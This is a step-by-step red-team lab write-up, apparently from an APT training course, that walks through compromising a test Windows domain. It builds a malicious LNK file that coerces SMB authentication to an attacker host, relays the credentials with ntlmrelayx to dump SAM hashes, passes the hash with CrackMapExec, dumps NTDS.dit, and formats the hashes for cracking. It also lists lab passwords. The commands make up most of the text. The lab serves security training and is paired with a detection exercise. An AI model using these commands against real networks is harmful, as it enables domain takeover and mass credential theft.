L1150-Red Pass-The-Hash - CrackMapExec

Lab Contents

Lab Overview

This lab will have the attacker leave a malicious LNK file on a domain share. A relay session will respond to this request and will be relayed. The successful relay attack will result in credential recovery that allows for lateral movement.

Lab Overview

• Generate a malicious LNK file. • Execute an SMB relay attack, beginning to end. • Relay the authentication responses to systems lacking SMB message integrity check enforcement (signing). • Steal NTLM hashes for a local system administrator. • Use CrackMapExec to pass-the-hash and move laterally. • Sync the domain’s NTDS.dit hashes to the attacker’s system.

Lab Methodology

Create a hostile network environment that will poison low level network queries and ultimately lead to compromise of an entire domain. Use a malicious LNK file and Impacket tool-kit's ntlmrelayx to relay credential material to pivot within the domain. Use CrackMapExec to escalate privileges with Pass the Hash and fully compromise the domain resulting in the disclosure of all domain account credential hashes.

Step One

Prepare Impacket to Accept and Pass The Hash

In this section of the lab, start by creating an SSH session. For reference, the connection information is presented below. For more information, see Lab L0330.

SSH: [email protected]
Password: APTClass2021!

Console Session 1: Impacket

For the relay portion of this attack, open a second SSH session to the Linux host at 10.10.98.20. The commands below will then initiate a privileged session providing Impacket toolkit low level access to the networking stack on the Linux box. The use of a virtual environment (venv) will configure a python dependency stack that allows multiple python services to operate from the single Linux host. For example, impacket is known to work with python3.6, while the CrackMapExec binaries work with python3.8.

Bash Input

cd /opt/impacket
source env/bin/activate

Bash Output

Once the virtual environment is activated – denoted by (env) seen above highlighted, install the Impacket toolkit. HINT: There is a space and a dot in the command below. This configures the installer to look in the local directory (.) for installation instructions.

Bash Input

sudo python3.8 -m pip install .

After the dependencies and impacket toolkit has been installed continue with the execution of the toolkit below. Launch ntlmrelayx.py with the following commands to target the WS01 system. This tool could also be used to run commands on the remote system[s]. Further, ntlmrelayx could also target an LDAP server, where SMB signing is enforced by default. Relaying a privileged account successfully over LDAP will result in an additional user with sync privileges being added to the target domain.

Bash Input

cd examples
sudo python3.8 ntlmrelayx.py -t 10.10.98.14 -smb2support

Bash Output

You have activated a python virtual environment, installed the impacket toolkit and launched ntlmrelayx.py. Move to the next section of the lab where operation from the itadmin’s RDP session on the Domain Controller will be used to execute the malicious LNK from the \dc01\labs\ fileshare and ultimately cause the compromise of the entire domain.

Step Two

In the prior section of this lab, the Impacket toolkit was configured to exchange authentication challenges with SMB requests and relay them to WS01. To start this section of the lab, connect to the Domain Controller, DC01 via remote desktop protocol. If you already have a session open, continue to use that session. Be sure to not close the PuTTY sessions initiated in this lab in Steps One and Two. Connection information is provided as reference below.

RDP: DC01.labs.local
Username: labs\itadmin
Password: APTClass2021!

PowerShell

Once there, open PowerShell and use the following code to write a malicious LNK file to the Labs share.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
dc01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Continue with the PowerShell session. The below command will create the malicious LNK file.

PowerShell Input

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Labs\Malicious.lnk")
$lnk.TargetPath = "\\10.10.98.20\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing the \\dc01\labs file share triggers SMB auth."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Step Three

Hostile Network - File Browsing

In this section, a privileged user is going to open a connection to the infected file share. The victim’s explorer will make an authentication request for the attacker’s listener. Once the authentication exchange occurs, credentials are relayed to the attacker’s target. From DC01, open C:\Labs\ in file explorer.

The malicious LNK file triggers, and NTLMRelayx takes over.

Step Four

Hostile Network - Impacket Toolkit

In step one of this lab, an SSH session to 10.10.98.20 was created, and the impacket toolkit's ntlmrelayx tool was installed and launched. In step two, a malicious LNK file was created and left in a writable network share. A privileged user then browsed the file share, triggering silent authentication to the attacker’s system.
Return now to Console Session 1 where ntlmrelayx was executed.

Console Session 2 (NTLMRelay) Returning to the Impacket toolkit NTLMRelay (ntlmrelayx) session (Console Session 1), you will note that Impacket had received an SMB connection request from the Domain Controller (10.10.98.10) with the LABS/ITADMIN session.
Impacket toolkit captured the credential hash of the session and forwarded it to WS01.labs.local via SMB.
Impacket then enabled the RemoteRegistry protocol on WS01 and enumeration of all local account hashes from the SAM database.
Hashes were enumerated in the format uid:rid:lmhash:nthash

Hash Format: The enumerated hashes are provided in the format uid:rid:lmhash:nthash.

Hash Enumeration Analysis: A local administrator account, “LocalAdmin” has been identified and its credential hash recovered in the SAM hash enumeration. The administrator account is quickly identified by its RID 500 (highlighted in bold-red above).

LocalAdmin Hash: The LanMan hash (lmhash) and an NTLM hash (nthash) were recovered for the LocalAdmin account. Note that part of the the LanMan hash enumerated is a well-known (highlighted in bold-green above). What does this mean?

Note: These hashes do not need to be cracked to be effectively used against the network. Troubleshooting: If you had difficulty with the ntlmrelayx and DNS, please referrer to the final section of this lab for troubleshooting potential DNS issues.

Exit the Tools

Impacket / NTLMRelayx:

Ctrl+c
deactivate

Continue onto the next step of this lab to systematically abuse captured NTLM hashes in an accelerated pace with CrackMapExec.

Step Five

Pass The Hash to Domain PWNAge (DCSync)

Like Attack Methodology Steps One and Two where multiple SSH sessions were initiated, continue the lab by creating a third SSH session.

SSH: [email protected]
Password: APTClass2021!

Console Session 2 (CrackMapExec)

Upon connecting to the SSH session on 10.10.98.20, continue by executing the following commands. The pre-packaged CrackMapExec binaries have made the tool very easy to execute, assuming python3.8 is installed and operational.

Bash Input

sudo -s
cd /opt/CrackMapExec
python3.8 cme

Bash Output

Based on this screen, CrackMap is ready for action on the network.

Impacket Review

The previous stages of this lab had us create an LNK and cause an authentication material exchange with a hostile host. Those materials were relayed to a domain workstation where the target’s SAM table was dumped. The credentials recovered during that relay attack can be reviewed in the /opt/impacket/examples/ directory.

The command below will print the recovered hashes.

Bash Input

cat /opt/impacket/examples/10.*

Bash Output

Pass-The-Hash/Relay (WS01)

The next command instructs CrackMapExec to authenticate against an SMB (file share) service on the WS01 system as LocalAdmin with the LM:NT hash recovered during the relay attack. The local-auth flag tells CrackMapExec to authenticate locally on the WS01.

Bash Input

python3.8 cme smb 10.10.98.14 -u itadmin -H e69b30df68c450aad94e3889274721f1 --local-auth

Bash Output

Attack Analysis: The WS01\itadmin account credential hash was used to authenticate on WS01. Upon connecting via SMB it was determined that the itadmin account was a Local Administrator of WS01. This is indicated in the CrackMapExec return by the (Pwn3d!) tag, highlighted in Bold-Yellow above.

Pass-The-Hash/Relay (DC01)

Next, try the itadmin hash against the domain controller’s IP address.

Bash Input

python3.8 cme smb 10.10.98.10 -u itadmin -H e69b30df68c450aad94e3889274721f1

Bash Output

Attack Analysis: The ITAdmin account credential hash was used to authenticate on DC01. Upon connecting via SMB it was determined that the ITAdmin account had administrative privilege on DC01 (consequently, a Domain Admin or similar context). This is indicated in the CrackMapExec return by the (Pwn3d!) tag, highlighted in Bold-Yellow above.

NTDS.dit Hash-Grab via Pass-The-Hash

Having confirmed compromise of a privileged account on the Domain Controller (LABS\ITAdmin), request a sync of the domain’s NTDS.dit entries using the ITAdmin account credential hash. This will enumerate all user credential hashes for the Active Directory Domain stored on the Domain Controller.

Run the following command to write the output to a file. The included head command will display the top four lines of the output.

Bash Input

python3.8 cme smb 10.10.98.10 -u itadmin -H e69b30df68c450aad94e3889274721f1 --ntds > domain-NTDS
head domain-NTDS -n 4

Bash Output

Attack Analysis: CrackMapExec was used to identify a Local Administrator on WS01 (itadmin) that allowed the enumeration of hashes from WS01. The enumeration included a credential hash for user LABS\itadmin. CrackMapExec was then used to confirm ITAdmin was a privileged user of DC01 and the Active Directory Domain. The LABS/ITAdmin credential hash was then used on DC01 to download credential hashes for all user accounts on the Active Directory domain with CrackMapExec’s NTDS module.

Continue to the next step of the lab to prepare the credential hashes for password cracking.

Step Five

Prepare Hashes For Password Cracking

In the previous lab section, a third SSH Console Session was initiated. This portion of the lab can utilize that same session. For reference, the connection information is presented below. For more information, see Lab L0330.

SSH: [email protected]
Password: APTClass2021!

Console Session 2 (CrackMapExec)

If continuing from the previous lab section, use the existing Console Session 2.
The previous lab section enumerated an Active Directory’s NTDS database which disclosed domain user account credential hashes. To inspect the credential hashes and prepare them for password cracking, some text manipulation commands are necessary. Below is a pipe sequence that reads the tool output and manipulates the contents. Before executing this command, read the explanation of the pipe sequence.

Bash Input

cat domain-NTDS | grep aad3b4 | grep -Fv '+' | grep -Fv '$' | tr -s " " | cut -d" " -f5 > cme-domain-Hashes

An explanation of the pipe sequence is provided below:

cat domain-NTDS        # Read the tool output file, domain-NTDS file.            ##INPUT FILE ##
grep aad3b4            # Return only rows containing aad3b4 because this helps trim the garbage from the tool’s output – only rows with hashes are returned. 
grep -Fv '+'           # Remove from return some unnecessary tool output 
grep -Fv ‘$’           # Remove from return computer/hidden accounts *$
tr -s “ ”              # Trim whitespace within output
cut -d “ ” -f 5        # Cut the output as a space delimited table and select only field (column) 5 (the username and hash field).
> cme-domain-Hashes    # Write the results to file cme-domain-Hashes.            ##OUTPUT FILE##

After reviewing the pipe sequence and command explanation, execute the commands below. Note that the head command will list the top three lines of the cme-domain-Hashes file. The wc command will count the lines within the file.

Bash Input

head cme-domain-Hashes -n 3
wc -l cme-domain-Hashes

Bash Output

This cme-domain-Hashes file contains 4081 hashes that have been prepared for cracking. This is indicated by the result of the wc -l cme-domain-Hashes output above.

If the output of this command is similar to the above, move to the Hunt Section to see if the pass-the-hash attacks can be discovered in Elastic.

Continue on to L1150-Blue

Lab Complete

created with the free version of Markdown Monster